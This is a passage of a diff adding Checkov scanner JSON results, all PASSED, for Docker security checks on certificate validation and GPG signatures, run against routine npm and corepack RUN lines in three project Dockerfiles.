--no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_2", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with curl", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_9", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + 